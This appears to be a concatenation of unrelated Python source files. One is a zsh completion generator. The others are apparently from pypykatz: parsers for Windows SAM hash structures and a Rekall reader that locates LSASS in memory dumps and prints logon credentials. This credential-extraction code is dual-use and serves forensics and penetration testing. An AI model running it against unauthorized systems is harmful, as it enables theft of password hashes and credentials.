#  * Neither the name of the  nor the names of its
#    contributors may be used to endorse or promote products derived from
#    this software without specific prior written permission.
#
#  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
#  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#  A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#  OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#  SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#  LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#  DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#  THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#  (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#  OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

import argparse
import contextlib
import datetime
import imp
import os
import pwd
import sys

import jinja2

__all__ = ['make_completion_from_argparse']
__version__ = '1.2'

# script.arguments
# script.author
# script.c_year
# script.name
# script.subparser_cmds
# script.subparsers
# version
ZSH_COMPLETION_TEMPLATE = """\
#compdef {{ script.name }}
# ------------------------------------------------------------------------------
# Copyright (c) {{ script.c_year }} {{ script.author }}
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#   * Redistributions of source code must retain the above copyright
#     notice, this list of conditions and the following disclaimer.
#   * Redistributions in binary form must reproduce the above copyright
#     notice, this list of conditions and the following disclaimer in the
#     documentation and/or other materials provided with the distribution.
#   * Neither the name of the project nor the
#     names of its contributors may be used to endorse or promote products
#     derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL ZSH-USERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ------------------------------------------------------------------------------
# Description
# -----------
#
#  Completion script for {{ script.name }}.
#
# ------------------------------------------------------------------------------
# Authors
# -------
#
#  * {{ script.author }}
#
# ------------------------------------------------------------------------------
# Generated with zpycompletion v{{ version }}
{% for subparser_cmd in script.subparser_cmds %}

{{ subparser_cmd.name }}() {
  _arguments \\
  {% for line in subparser_cmd.arguments %}
    {{ line }}
  {% endfor %}
}
{% endfor %}

{% for subparser in script.subparsers %}

{{ subparser.name }}() {
  local -a _subparser_cmds
  _subparser_cmds=(
    {% for action in subparser.actions %}
    "{{ action.name }}:{{ action.help }}"
    {% endfor %}
  )

  if (( CURRENT == {{ subparser.position }} )); then
    _describe "commands" _subparser_cmds
  else
    local curcontext="$curcontext"
    cmd="${${_subparser_cmds[(r)$words[{{ subparser.position }}]:*]%%:*}}"
    if (( $#cmd )); then
      if (( $+functions[{{ subparser.name }}_cmd_$cmd] )); then
        {% if subparser.position > 1 -%}
        (( CURRENT -= {{ subparser.position - 1 }} ))
        shift {{ subparser.position - 1 }} words
        {% endif -%}
        {{ subparser.name }}_cmd_$cmd CURRENT
      else
        _files
      fi
    else
      _message "unknown command: $words[{{ subparser.position }}]"
    fi
  fi
}
{% endfor %}
_arguments \\
{% for line in script.arguments %}
  {{ line }}
{% endfor %}
"""

def _actions_sort(action):
	if len(action.option_strings):
		return sorted(action.option_strings)[-1]
	return ''

def _argument_action(action):
	zarg_action = ''
	if action.choices:
		zarg_action = ':(' + ' '.join(action.choices) + ')'
	elif isinstance(action.type, argparse.FileType):
		zarg_action = ':_files'
	return zarg_action

class _ZshCompletion(object):
	def __init__(self, parser):
		self.parser = parser
		self.arguments = []
		self.subparsers = []
		self.subparser_cmds = []
		actions = sorted(self.parser._actions, key=_actions_sort)
		self.arguments = self._parse_actions(actions)

	def _parse_actions(self, actions, subparser_name=None):
		lines = []
		subparser = None
		positional = 1
		for action in actions:
			if isinstance(action, argparse._SubParsersAction):
				subparser = (action, positional)
				continue
			if isinstance(action, argparse._HelpAction):
				lines.append("{-h,--help}\"[show help text]\"")
				continue

			if len(action.option_strings) == 0: # positional
				if isinstance(action.nargs, int) and action.nargs > 1:
					for _ in range(positional, (positional + action.nargs)):
						lines.append("\"{0}::{1}{2}\"".format(positional, action.dest, _argument_action(action)))
						positional += 1
					continue
				elif action.nargs in (argparse.REMAINDER, '*', '+'):
					line = '"*'
				elif action.nargs in (None, 1, '?'):
					line = '"' + str(positional)
					positional += 1
				line += ':' + action.dest
			else:
				if len(action.option_strings) == 1:
					options = '"' + action.option_strings[0]
				else:
					options = '{' + ','.join(action.option_strings) + '}"'
				if isinstance(action, argparse._AppendAction):
					line = '"*"' + options + "[{0}]:{1}".format(action.help, action.dest.replace('_', ' '))
				elif isinstance(action, argparse._StoreAction):
					line = options + "[{0}]:{1}".format(action.help, action.dest.replace('_', ' '))
				elif isinstance(action, argparse._VersionAction):
					line = options + '[show version information]'
				elif isinstance(action, argparse._StoreConstAction):
					line = options + '[' + action.help + ']'
				else:
					continue
			line += _argument_action(action) + '"'
			lines.append(line)

		if subparser:
			subparser, position = subparser
			subp_actions = map(lambda a: dict(name=a.dest, help=a.help), subparser._choices_actions)
			subp_dest = ('action' if subparser.dest == argparse.SUPPRESS else subparser.dest)
			subp_name = (subparser_name or '_subparser') + '_' + subp_dest
			self.subparsers.append(dict(name=subp_name, position=position, actions=subp_actions))

			lines.append("\"*::{0}:{1}\"".format(subp_dest, subp_name))
			for key, value in subparser._name_parser_map.items():
				subp_cmd_name = "{0}_cmd_{1}".format(subp_name, key)
				subp_cmd_arguments = self._parse_actions(value._actions, subparser_name=subp_name)
				self.subparser_cmds.append(dict(name=subp_cmd_name, arguments=subp_cmd_arguments))

		for i in range(len(lines) - 1):
			lines[i] = lines[i] + ' \\'
		return lines

def make_completion_from_argparse(parser, destination=None, input_prompt=True):
	"""
	Create a zsh completion file from a :py:class:`argparse.ArgumentParser`
	instance.

	:param parser: The parser instance to build completions for.
	:type parser: :py:class:`argparse.ArgumentParser`
	:param bool input_prompt: Whether to prompt for user input or not.
	"""
	script = {}
	#script['author'] = pwd.getpwuid(os.getuid()).pw_gecos
	#if input_prompt:
	#	script['author'] = input("[?] author ({0}): ".format(script['author'])) or script['author']
	#script['c_year'] = datetime.date.today().year
	#if input_prompt:
	#	script['c_year'] = input("[?] copyright year ({0}): ".format(script['c_year'])) or script['c_year']
	#script['name'] = parser.prog
	#if input_prompt:
	#	script['name'] = input("[?] script name ({0}): ".format(script['name'])) or script['name']

	zsh_comp = _ZshCompletion(parser)
	script['arguments'] = zsh_comp.arguments
	script['subparsers'] = zsh_comp.subparsers
	script['subparser_cmds'] = zsh_comp.subparser_cmds

	return script
	#env = jinja2.Environment(trim_blocks=True)
	#template = env.from_string(ZSH_COMPLETION_TEMPLATE)
	#destination = destination or '_' + script['name']
	#with open(destination, 'w') as file_h:
	#	file_h.write(template.render(script=script, version=__version__))
	#print('[*] completion saved as: ' + destination)

class _FakeArgparse(object):
	def __init__(self):
		self.parser = None

	def __getattr__(self, name):
		if name == 'ArgumentParser':
			return self._hook
		return getattr(argparse, name)

	def _hook(self, *args, **kwargs):
		self.parser = argparse.ArgumentParser(*args, **kwargs)
		return self.parser

@contextlib.contextmanager
def _muted_std_streams():
	stdout = sys.stdout
	stderr = sys.stderr
	sys.stdout = open(os.devnull, 'w')
	sys.stderr = open(os.devnull, 'w')
	try:
		yield
	except Exception:
		raise
	finally:
		sys.stdout = stdout
		sys.stderr = stderr

def main():
	parser = argparse.ArgumentParser()
	parser.add_argument('-m', '--method', dest='target_function', default='main', help='the function which creates the ArgumentParser instance')
	parser.add_argument('-o', '--output', dest='output', help='the path to write the completion file to')
	parser.add_argument('--no-prompt', dest='input_prompt', default=True, action='store_false', help='do not prompt for input')
	parser.add_argument('script', help='the python script to load from')
	arguments = parser.parse_args()

	script = os.path.abspath(arguments.script)
	if not os.path.isfile(script):
		print('[-] invalid script file: ' + script)
		return
	script_path, script_name = os.path.split(script)

	sys.path.append(script_path)
	script_import_name = script_name
	if script_import_name.endswith('.py'):
		script_import_name = script_name[:-3]

	sys.dont_write_bytecode = True
	sys.modules['argparse'] = _FakeArgparse()
	print('[*] importing: ' + script_import_name)
	try:
		module = imp.load_source(script_import_name, script)
	except SyntaxError:
		print('[!] failed to import the python file')
		return

	if not hasattr(module, arguments.target_function):
		print("[-] the specified script has no {0}() function".format(arguments.target_function))
		print('[-] can not automatically get the parser instance')
		return

	sys.argv = [script_name, '--help']
	try:
		with _muted_std_streams():
			getattr(module, arguments.target_function)()
	except SystemExit:
		pass
	if not sys.modules['argparse'].parser:
		print("[-] no parser was created in {0}.{1}()".format(script_name, arguments.target_function))
		return
	make_completion_from_argparse(sys.modules['argparse'].parser, destination=arguments.output, input_prompt=arguments.input_prompt)

if __name__ == '__main__':
	main()


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import io

class DOMAIN_ACCOUNT_F:
	def __init__(self):
		self.revision = None
		self.unk1 = None
		self.creation_time = None
		self.domain_modified_count = None
		self.max_pw_age = None
		self.min_pw_age = None
		self.force_logoff = None
		self.lockout_duration = None
		self.lockout_observation_window = None
		self.unk2 = None
		self.next_rid = None
		self.pw_properties = None
		self.min_pw_length = None
		self.pw_history_length = None
		self.lockout_treshold = None
		self.unk3 = None
		self.server_state = None
		self.server_role = None
		self.uas_compatibility_req = None
		self.unk4 = None
		self.key_0 = None
	
	@staticmethod
	def from_bytes(data):
		return DOMAIN_ACCOUNT_F.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		df = DOMAIN_ACCOUNT_F()
		df.revision = int.from_bytes(buff.read(4), 'little', signed = False)
		df.unk1 = int.from_bytes(buff.read(4), 'little', signed = False)
		df.creation_time = int.from_bytes(buff.read(8), 'little', signed = False)
		df.domain_modified_count = int.from_bytes(buff.read(8), 'little', signed = False)
		df.max_pw_age = int.from_bytes(buff.read(8), 'little', signed = False)
		df.min_pw_age = int.from_bytes(buff.read(8), 'little', signed = False)
		df.force_logoff = int.from_bytes(buff.read(8), 'little', signed = False)
		df.lockout_duration = int.from_bytes(buff.read(8), 'little', signed = False)
		df.lockout_observation_window = int.from_bytes(buff.read(8), 'little', signed = False)
		df.unk2 = int.from_bytes(buff.read(8), 'little', signed = False)
		df.next_rid = int.from_bytes(buff.read(4), 'little', signed = False)
		df.pw_properties = int.from_bytes(buff.read(4), 'little', signed = False)
		df.min_pw_length = int.from_bytes(buff.read(2), 'little', signed = False)
		df.pw_history_length = int.from_bytes(buff.read(2), 'little', signed = False)
		df.lockout_treshold = int.from_bytes(buff.read(2), 'little', signed = False)
		df.unk3 = int.from_bytes(buff.read(2), 'little', signed = False)
		df.server_state = int.from_bytes(buff.read(4), 'little', signed = False)
		df.server_role = int.from_bytes(buff.read(2), 'little', signed = False)
		df.uas_compatibility_req = int.from_bytes(buff.read(2), 'little', signed = False)
		df.unk4 = int.from_bytes(buff.read(8), 'little', signed = False)
		
		pos = buff.tell()
		marker = buff.read(1)
		buff.seek(pos,0)
		if marker == b'\x01':
			df.key_0 = SAM_KEY_DATA.from_buffer(buff)
		elif marker == b'\x02':
			df.key_0 = SAM_KEY_DATA_AES.from_buffer(buff)
		return df
		
	def __str__(self):
		t = '== DOMAIN_ACCOUNT_F ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
class SAM_KEY_DATA:
	def __init__(self):
		self.revision = None
		self.length = None
		self.salt = None
		self.key = None
		self.checksum = None
		self.reserved = None
	
	@staticmethod
	def from_bytes(data):
		return SAM_KEY_DATA.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = SAM_KEY_DATA()
		sk.revision = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.salt = buff.read(16)
		sk.key = buff.read(16)
		sk.checksum = buff.read(16)
		sk.reserved = int.from_bytes(buff.read(8), 'little', signed = False)
		return sk
		
	def __str__(self):
		t = '== SAM_KEY_DATA ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
class SAM_KEY_DATA_AES:
	def __init__(self):
		self.revision = None
		self.length = None
		self.checksum_length = None
		self.data_length = None
		self.salt = None
		self.data = None
	
	@staticmethod
	def from_bytes(data):
		return SAM_KEY_DATA_AES.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = SAM_KEY_DATA_AES()
		sk.revision = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.checksum_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.data_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.salt = buff.read(16)
		sk.data = buff.read(sk.data_length)
		return sk
		
	def __str__(self):
		t = '== SAM_KEY_DATA_AES ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
class USER_ACCOUNT_V:
	def __init__(self):
		self.Unknown = None 
		self.NameOffset = None 
		self.NameLength = None 
		self.Unknown2 = None 
		self.FullNameOffset = None 
		self.FullNameLength = None 
		self.Unknown3 = None 
		self.CommentOffset = None 
		self.CommentLength = None 
		self.Unknown31 = None 
		self.UserCommentOffset = None 
		self.UserCommentLength = None 
		self.Unknown4 = None 
		self.Unknown5 = None 
		self.HomeDirOffset = None 
		self.HomeDirLength = None 
		self.Unknown6 = None 
		self.HomeDirConnectOffset = None 
		self.HomeDirConnectLength = None 
		self.Unknown7 = None 
		self.ScriptPathOffset = None 
		self.ScriptPathLength = None 
		self.Unknown8 = None 
		self.ProfilePathOffset = None 
		self.ProfilePathLength = None 
		self.Unknown9 = None 
		self.WorkstationsOffset = None 
		self.WorkstationsLength = None 
		self.Unknown10 = None 
		self.HoursAllowedOffset = None 
		self.HoursAllowedLength = None 
		self.Unknown11 = None 
		self.Unknown12 = None 
		self.LMHashOffset = None 
		self.LMHashLength = None 
		self.Unknown13 = None 
		self.NTHashOffset = None 
		self.NTHashLength = None 
		self.Unknown14 = None 
		self.Unknown15 = None 
		self.Data = None
		
		self.name = None
		self.fullname = None
		self.comment = None
		self.usercomment = None
		self.homedir = None
		self.homedir_connect = None
		self.script_path = None
		self.profile_path = None
		self.workstations = None
		self.hoursallowed = None
		self.LM_hash = None
		self.NT_hash = None
		
	@staticmethod
	def from_bytes(data):
		return USER_ACCOUNT_V.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		uac = USER_ACCOUNT_V()		
		uac.Unknown = buff.read(12) 
		uac.NameOffset = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.NameLength = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.Unknown2 = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.FullNameOffset = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.FullNameLength = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.Unknown3 = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.CommentOffset = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.CommentLength = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.Unknown31 = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.UserCommentOffset = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.UserCommentLength = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.Unknown4 = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.Unknown5 = buff.read(12)  
		uac.HomeDirOffset = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.HomeDirLength = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.Unknown6 = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.HomeDirConnectOffset = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.HomeDirConnectLength = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.Unknown7 = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.ScriptPathOffset = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.ScriptPathLength = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.Unknown8 = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.ProfilePathOffset = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.ProfilePathLength = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.Unknown9 = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.WorkstationsOffset = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.WorkstationsLength = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.Unknown10 = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.HoursAllowedOffset = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.HoursAllowedLength = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.Unknown11 = int.from_bytes(buff.read(4), 'little', signed = False)  
		uac.Unknown12 = buff.read(12) 
		uac.LMHashOffset = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.LMHashLength = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.Unknown13 = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.NTHashOffset = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.NTHashLength = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.Unknown14 = int.from_bytes(buff.read(4), 'little', signed = False) 
		uac.Unknown15 = buff.read(24)
		data_offset = buff.tell()
		
		if uac.NameLength > 0:
			buff.seek(data_offset +uac.NameOffset)
			uac.name = buff.read(uac.NameLength).decode('utf-16-le')
		
		if uac.FullNameLength > 0:
			buff.seek(data_offset +uac.FullNameOffset)
			uac.fullname = buff.read(uac.FullNameLength).decode('utf-16-le')
		if uac.CommentLength > 0:
			buff.seek(data_offset +uac.CommentOffset)
			uac.comment = buff.read(uac.CommentLength).decode('utf-16-le')
		if uac.UserCommentLength > 0:
			buff.seek(data_offset +uac.UserCommentOffset)
			uac.usercomment = buff.read(uac.UserCommentLength).decode('utf-16-le')
		if uac.HomeDirLength > 0:
			buff.seek(data_offset +uac.HomeDirOffset)
			uac.homedir = buff.read(uac.HomeDirLength).decode('utf-16-le')
		if uac.HomeDirConnectLength > 0:
			buff.seek(data_offset +uac.HomeDirConnectOffset)
			uac.homedir_connect = buff.read(uac.HomeDirConnectLength).decode('utf-16-le')
		
		if uac.ScriptPathLength > 0:
			buff.seek(data_offset +uac.ScriptPathOffset)
			uac.script_path = buff.read(uac.ScriptPathLength).decode('utf-16-le')
		if uac.ProfilePathLength > 0:
			buff.seek(data_offset +uac.ProfilePathOffset)
			uac.profile_path = buff.read(uac.ProfilePathLength).decode('utf-16-le')
		if uac.WorkstationsLength > 0:
			buff.seek(data_offset +uac.WorkstationsOffset)
			uac.workstations = buff.read(uac.WorkstationsLength).decode('utf-16-le')
		if uac.HoursAllowedLength > 0:
			buff.seek(data_offset +uac.HoursAllowedOffset)
			uac.hoursallowed = buff.read(uac.HoursAllowedLength)
		
		if uac.NTHashLength > 0:
			buff.seek(data_offset + uac.NTHashOffset + 2)
			if buff.read(1) == b'\x01':
				if uac.NTHashLength == 20:
					buff.seek(data_offset + uac.NTHashOffset)
					uac.NT_hash = SAM_HASH.from_bytes(buff.read(uac.NTHashLength))
				
				if uac.LMHashLength == 20:
					buff.seek(data_offset + uac.LMHashOffset)
					uac.LM_hash = SAM_HASH.from_bytes(buff.read(uac.LMHashLength))
		
			else:
				if uac.LMHashLength == 24:
					buff.seek(data_offset + uac.LMHashOffset)
					uac.LM_hash = SAM_HASH_AES.from_bytes(buff.read(uac.LMHashLength))
				
				buff.seek(data_offset  +uac.NTHashOffset)
				uac.NT_hash = SAM_HASH_AES.from_bytes(buff.read(uac.NTHashLength))
				
		return uac
		
	def __str__(self):
		t = '== USER_ACCOUNT_V ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
		
class SAM_HASH:
	def __init__(self):
		self.pekID = None
		self.revision = None
		self.hash = None
	
	@staticmethod
	def from_bytes(data):
		return SAM_HASH.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = SAM_HASH()
		sk.pekID = int.from_bytes(buff.read(2), 'little', signed = False) 
		sk.revision = int.from_bytes(buff.read(2), 'little', signed = False) 
		sk.hash = buff.read(16)
		return sk
		
	def __str__(self):
		t = '== SAM_HASH ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
class SAM_HASH_AES:
	def __init__(self):
		self.pekID = None
		self.revision = None
		self.data_offset = None
		self.salt = None
		self.data = None
	
	@staticmethod
	def from_bytes(data):
		return SAM_HASH_AES.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = SAM_HASH_AES()
		sk.pekID = int.from_bytes(buff.read(2), 'little', signed = False) 
		sk.revision = int.from_bytes(buff.read(2), 'little', signed = False) 
		sk.data_offset = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.salt = buff.read(16)
		sk.data = buff.read()
		return sk
		
	def __str__(self):
		t = '== SAM_HASH_AES ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
# Kudos:
#  Buherator (@buherator) for helping me navigate the Peb
#

import logging

from pypykatz.pypykatz import pypykatz
from pypykatz.commons.common import *

from . import *

class RekallModule:
	def __init__(self):
		self.name = None
		self.start_addr = None
		self.end_addr = None
		self.size = None

	@staticmethod
	def from_module(module):
		rm = RekallModule()
		rm.name = str(module.BaseDllName).lower()
		rm.start_addr = int(module.DllBase)
		rm.size = int(module.SizeOfImage)
		rm.end_addr = rm.start_addr + rm.size
		return rm

class RekallReader:
	def __init__(self, timestamp_override = None, buildnumber = None):
		"""
		Timestamp override will change the msv_dll_timestamp value.
		If None > no change
		If 0 > it disables the ANIT_MIMIKATZ structs on certain builds
		If 1 > it enforces to use the ANTI_MIMIKATZ structs on certain builds
		"""
		
		self.session = None
		self.lsass_task = None
		self.cc = None
		self.task_as = None
		self.cur_pos = None
		self.modules = {}
		
		self.timestamp_override = timestamp_override
		#needed for pypykatz
		self.processor_architecture = None
		self.BuildNumber = buildnumber
		self.msv_dll_timestamp = None #a special place in our hearts....

		
	def setup(self):
		self.cc = self.session.plugins.cc()
		self.search_lsass()
		self.task_as = self.lsass_task.get_process_address_space()
		self.processor_architecture = self.get_arch()
		if not self.BuildNumber:
			self.BuildNumber = self.get_buildnumber()
		
		if self.timestamp_override:
			if self.timestamp_override == 0:
				sysinfo.msv_dll_timestamp = 0x53480000 - 1
			elif self.timestamp_override == 1:
				sysinfo.msv_dll_timestamp = 0x53480000 + 1
		
		self.load_modules()

	@staticmethod
	def from_memory_file(memory_file, timestamp_override = None, buildnumber = None):
		logging.info('Invoking recall on file %s' % memory_file)
		rsession = session.Session(
			filename = memory_file,
			autodetect=['rsds', 'pe', 'windows_kernel_file'],
			logger = logging.getLogger('pypykatz'),
			autodetect_build_local = 'full',
			autodetect_scan_length=10*1024*1024*1024,
			profile_path=["https://github.com/google/rekall-profiles/raw/master", "http://profiles.rekall-forensic.com"]
			)

		return RekallReader.from_session(rsession, timestamp_override, buildnumber)


	@staticmethod
	def from_session(session, timestamp_override = None, buildnumber = None):
		rr = RekallReader(timestamp_override, buildnumber)
		rr.session = session
		rr.setup()
		return rr

	def get_buildnumber(self):
		return int(self.lsass_task.Peb.OSBuildNumber)

	def get_arch(self):
		if self.session.profile.metadata("arch")[-2:] == '64':
			return KatzSystemArchitecture.X64
		return KatzSystemArchitecture.X86

	def align(self, alignment = None):
		"""
		Repositions the current reader to match architecture alignment
		"""
		if alignment is None:
			if self.processor_architecture == KatzSystemArchitecture.X64:
				alignment = 8
			else:
				alignment = 4
		offset = self.cur_pos % alignment
		if offset == 0:
			return
		offset_to_aligned = (alignment - offset) % alignment
		self.read(offset_to_aligned)
		return

	def tell(self):
		"""
		Returns the current virtual address
		"""
		return self.cur_pos

	def read_int(self):
		"""
		Reads an integer. The size depends on the architecture. 
		Reads a 4 byte small-endian singed int on 32 bit arch
		Reads an 8 byte small-endian singed int on 64 bit arch
		"""
		if self.processor_architecture == KatzSystemArchitecture.X64:
			return int.from_bytes(self.read(8), byteorder = 'little', signed = True)
		else:
			return int.from_bytes(self.read(4), byteorder = 'little', signed = True)
	
	def read_uint(self):
		"""
		Reads an integer. The size depends on the architecture. 
		Reads a 4 byte small-endian unsinged int on 32 bit arch
		Reads an 8 byte small-endian unsinged int on 64 bit arch
		"""
		if self.processor_architecture == KatzSystemArchitecture.X64:
			return int.from_bytes(self.read(8), byteorder = 'little', signed = False)
		else:
			return int.from_bytes(self.read(4), byteorder = 'little', signed = False)

	def get_ptr(self, pos):
		self.move(pos)
		return self.read_uint()

	def get_ptr_with_offset(self, pos):
		if self.processor_architecture == KatzSystemArchitecture.X64:
			self.move(pos)
			ptr = int.from_bytes(self.read(4), byteorder = 'little', signed = True)
			return pos + 4 + ptr
		else:
			self.move(pos)
			return self.read_uint()


	def move(self, pos):
		self.cur_pos = pos

	def read(self, size):
		data = self.task_as.read(self.cur_pos, size)
		self.cur_pos += size
		return data

	def peek(self, size):
		return self.task_as.read(self.cur_pos, size)

	def load_modules(self):
		self.task_as = self.lsass_task.get_process_address_space()
		for module in self.lsass_task.get_load_modules():
			self.modules[str(module.BaseDllName).lower()] = RekallModule.from_module(module)
			if str(module.BaseDllName).lower() == 'msv1_0.dll':
				self.msv_dll_timestamp = int(module.TimeDateStamp)
				if self.msv_dll_timestamp == 0:
					self.session.logging.info('WARNING! msv.dll timestamp not found! This could cause errors with older windows builds. You might need to specify it manually for anti_mimikatz structs!')
					self.msv_dll_timestamp = 0

	def search_lsass(self):
		self.session.logging.info('Searching LSASS process')
		tasks = []
		for task in self.session.plugins.pslist(proc_regex='lsass.exe').filter_processes():
			tasks.append(task)

		if len(tasks) > 1:
			self.session.logging.info('WARNING! Multiple processes matched the filter!! Using first one!')

		if len(tasks) == 0:
			raise Exception('LSASS.exe not found!')

		self.lsass_task = tasks[0]
		self.cc.SwitchProcessContext(self.lsass_task)

	def load_module(self, module_name):
		for module in self.lsass_task.get_load_modules():
			#print(module.BaseDllName)
			process_offset = self.task_as.vtop(self.lsass_task.obj_offset)
			if not process_offset:
				raise Exception('Cant get module! %s' % module_name)
			if str(module.BaseDllName).lower() != module_name:
				continue
			else:
				self.session.logging.info('Found module!')
				return module
			

	def find_in_module(self, module_name, pattern, find_first = False, reverse_order = False):
		if module_name.lower() not in self.modules:
			raise Exception('Module is not in lsass emmory space! %s' % module_name)
		module = self.modules[module_name.lower()]
		res = []
		scanner = rekall.scan.MultiStringScanner(
			needles=[pattern],
			address_space=self.lsass_task.get_process_address_space()
			)
		self.session.logging.info('module.start_addr %s' % module.start_addr)
		for hit, _ in scanner.scan(offset=int(module.start_addr), maxlen=int(module.size)):
			res.append(int(hit))
		return res

if __name__ == '__main__':
	logging.basicConfig(level=logging.DEBUG)
	memory_file = 'memory.dmp'
	reader = RekallReader(memory_file)
	print(reader.session.profile.metadata("arch"))
	#reader.search_module('lsasrv.dll', b'\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15')
	sysinfo = KatzSystemInfo.from_rekallreader(reader)
	print(sysinfo.architecture)
	p = pypykatz.pypykatz(reader, sysinfo)
	mimi = p.start()
	for luid in p.logon_sessions:
		print(str(p.logon_sessions[luid]))
	print('Done!')




import platform
from pypykatz import logger
from minidump.minidumpfile import MinidumpFile
from pypykatz.commons.common import KatzSystemInfo
from pypykatz.rdp.packages.creds.templates import RDPCredsTemplate
